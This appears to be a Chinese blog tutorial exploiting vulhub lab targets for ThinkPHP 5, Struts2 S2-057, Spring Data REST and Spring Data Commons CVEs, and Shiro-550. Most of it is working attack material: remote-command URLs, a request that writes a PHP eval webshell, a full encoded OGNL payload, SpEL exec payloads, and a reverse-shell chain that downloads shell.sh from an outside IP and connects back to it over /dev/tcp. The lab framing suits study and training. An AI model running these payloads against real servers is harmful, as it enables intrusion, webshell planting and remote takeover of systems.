【常见框架漏洞】ThinkPHP、struts2、Spring、Shiro

cc7752102024-09-27 17:05

一、ThinkPHP

1.环境配置

靶场:
	vulhub/thinkphp/5-rce
	docker-compose up -d #启动环境
访问靶场:http://ip:8080/index.php

2.远程命令执行

执行whoami命令

poc:
http://47.121.211.205:8080/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

成功执行whoami命令

3.远程代码执行

执行phpinfo命令

POC:
http://47.121.211.205:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

4.GetShell

写入一句话木马到1.php

POC:
http://47.121.211.205:8080/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST[cmd]);?>' > 1.php

使用hacker插件执行phpinfo 成功执行说明成功写入木马

二、struts2

1.环境配置

靶场:
	vulhub/struts2/s2-057
	docker-compose up -d #启动环境
访问靶场:http://ip:8080/struts2-showcase

2.漏洞验证

访问http://47.121.211.205:8080/struts2-showcase/${(123+123)}/actionChain1.action

发现中间的数字位置进行相加 说明命令被执行了

3.漏洞利用

执行以下POC 可以查看whoami命令执行结果

$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D

三、Spring

Spring Data Rest 远程命令执行命令(CVE-2017-8046)

1.环境配置

靶场:
	vulhub/spring/CVE-2017-8046
	docker-compose up -d #启动环境
访问靶场:http://ip:8080/customers/1

2.漏洞利用

修改请求方法为PATCH 并创建一个success文件(经过ascii码进行转换)

PATCH /customers/1 HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 202

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value":"vulhub" }]

3.进入容器查看是否创建成功

docker exec -it 容器id /bin/bash

Spring 代码执行 (CVE-2018-1273)

1.环境配置

靶场:
	vulhub/spring/CVE-2018-1273
	docker-compose up -d #启动环境
访问靶场:http://ip:8080/users

2.漏洞利用

填写注册信息然后抓包 添加POC信息 创建一个zcc文件

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/zcc")]=&password=&repeatedPassword=

3.进入容器查看是否创建成功

docker exec -it 容器id /bin/bash

4.反弹shell

在服务器创建一个shell.sh文件 文件内容为反弹shell的命令

bash -i >& /dev/tcp/47.121.211.205/8888 0>&1

在注册页面抓包 然后让靶机远程下载我们编辑好的shell.sh文件

远程下载shell.sh脚本命令

/usr/bin/wget -qO /tmp/shell.sh http://47.121.211.205/shell.sh

查看shell.sh是否被下载

执行脚本文件

/bin/bash /tmp/shell.sh

监听端口

nc -lvvp 8888

成功反弹shell

四、Shiro

Shiro rememberMe反序列化漏洞(Shiro-550)

1.环境配置

靶场:
	vulhub/shiro/CVE-2016-4437
	docker-compose up -d #启动环境
访问靶场:http://ip:8080

2.漏洞验证

使用BurpSuite进行抓包,在请求包中的cookie字段中添加rememberMe=123;

看响应包header中是否返回rememberMe=deleteMe值,若有,则证明该系统使用了Shiro框架:

3.漏洞利用

使用工具进行命令执行

成功执行whoami命令

相关推荐
小旋风-java7 分钟前
springboot整合dwr
java·spring boot·后端·dwr
JAVA坚守者13 分钟前
Maven常见解决方案
java·maven
聊天宝快捷回复24 分钟前
必收藏,售后客服日常回复必备的话术 (精华版)
java·前端·数据库·经验分享·微信·职场发展·快捷回复
wanyuanshi26 分钟前
map的键排序方法
java·数据结构·算法
热爱前端的小wen29 分钟前
maven的介绍与安装
java·spring·maven·springboot
追风小老头折腾程序1 小时前
Java单体服务和集群分布式SpringCloud微服务的理解
java·后端·spring·spring cloud
java_heartLake1 小时前
设计模式之观察者模式
java·观察者模式·设计模式
2401_857617621 小时前
Spring Boot电商开发:购物商城系统
java·spring boot·后端
你不要在理我了1 小时前
Thinkphp5x远程命令执行 靶场攻略
java·后端·spring
热门推荐
01组基轨迹建模 GBTM的介绍与实现(Stata 或 R)02RAG 实践- Ollama+RagFlow 部署本地知识库032024年高教社杯数学建模国赛C题超详细解题思路分析042024年网络安全比赛--系统渗透测试(超详细)05yolov8实战第五天——yolov8+ffmpg实时视频流检测并进行实时推流——(推流,保姆教学)06【2024数模国赛赛题思路公开】国赛B题思路丨附可运行代码丨无偿自提07CANoe Trace窗口过滤栏消失的几种解决方法(附上最终解决方案)08软件工程从理论到实践客观题汇总(头歌第一章至第八章)09【2024高教社杯全国大学生数学建模竞赛】B题 生产过程中的决策问题——解题思路 代码 论文10[Qt]Qt框架解析:从入门到精通,探索平台开发的无限可能